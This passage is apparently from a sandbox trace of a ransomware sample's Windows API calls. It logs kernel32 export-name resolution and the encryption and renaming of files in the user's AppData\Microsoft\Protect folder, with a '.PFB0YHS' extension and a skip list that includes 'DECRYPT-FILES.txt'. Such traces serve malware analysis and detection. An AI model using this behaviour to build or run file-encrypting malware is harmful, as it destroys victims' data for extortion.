(lpString="DEBUGBREAKPROCESS") returned 17 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.441] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.441] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.441] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.441] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.441] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.441] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.441] lstrlenA (lpString="DELETEATOM") returned 10 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.441] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.441] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.441] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.441] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.442] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.442] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.442] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.442] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.442] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.442] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.442] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.442] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.442] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.442] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.442] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.442] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.442] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.442] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.442] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.442] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.442] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.442] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.442] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.442] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.443] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.443] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.443] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.443] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.443] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.443] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.443] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.443] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.443] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.443] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.443] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.443] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.443] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.443] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.443] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.443] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.443] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.443] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.444] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.444] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned 120 [0078.444] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.PFB0YHS") returned 128 [0078.444] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.PFB0YHS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.pfb0yhs"), dwFlags=0x0) returned 1 [0078.444] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.445] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.445] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.445] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x542fc610, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x542fc610, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xf6455540, ftLastWriteTime.dwHighDateTime=0x1d4ae2c, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0078.445] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0078.445] CloseHandle (hObject=0x450) returned 1 [0078.446] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2b1e4b40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b1e4b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x36031920, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0078.446] lstrcmpiW (lpString1="SYNCHIST", lpString2="DECRYPT-FILES.txt") returned 1 [0078.446] lstrcmpiW (lpString1="SYNCHIST", lpString2="autorun.inf") returned 1 [0078.446] lstrcmpiW (lpString1="SYNCHIST", lpString2="boot.ini") returned 1 [0078.446] lstrcmpiW (lpString1="SYNCHIST", lpString2="desktop.ini") returned 1 [0078.446] lstrcmpiW (lpString1="SYNCHIST", lpString2="ntuser.dat") returned 1 [0078.446] lstrcmpiW (lpString1="SYNCHIST", lpString2="iconcache.db") returned 1 [0078.446] lstrcmpiW (lpString1="SYNCHIST", lpString2="bootsect.bak") returned 1 [0078.446] lstrcmpiW (lpString1="SYNCHIST", lpString2="ntuser.dat.log") returned 1 [0078.446] lstrcmpiW (lpString1="SYNCHIST", lpString2="thumbs.db") returned -1 [0078.446] lstrcmpiW (lpString1="SYNCHIST", lpString2="Bootfont.bin") returned 1 [0078.446] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0078.446] lstrlenW (lpString="SYNCHIST") returned 8 [0078.446] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" [0078.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="SYNCHIST" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" [0078.446] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0078.447] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=76) returned 1 [0078.447] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0078.447] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.447] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.447] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.447] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.449] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0078.449] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.449] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.450] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.450] CloseHandle (hObject=0x454) returned 1 [0078.450] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.450] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0078.451] CloseHandle (hObject=0x0) returned 0 [0078.451] CloseHandle (hObject=0x450) returned 1 [0078.452] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.452] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.452] GetTickCount () returned 0x114c1ca [0078.452] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.453] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.453] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.453] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.453] lstrlenA (lpString="kernel32.dll") returned 12 [0078.453] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.453] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.453] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.453] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.453] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.454] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.454] lstrlenA (lpString="ADDATOMA") returned 8 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.454] lstrlenA (lpString="ADDATOMW") returned 8 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.454] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.454] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.454] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.454] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.454] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.454] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.454] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.454] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.454] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.454] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.454] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.454] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.454] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.454] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.454] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.454] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.455] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.455] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.455] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.455] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.455] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.455] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.455] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.455] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.455] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.455] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.455] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.455] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.455] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.455] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.455] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.455] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.455] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.455] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.455] lstrlenA 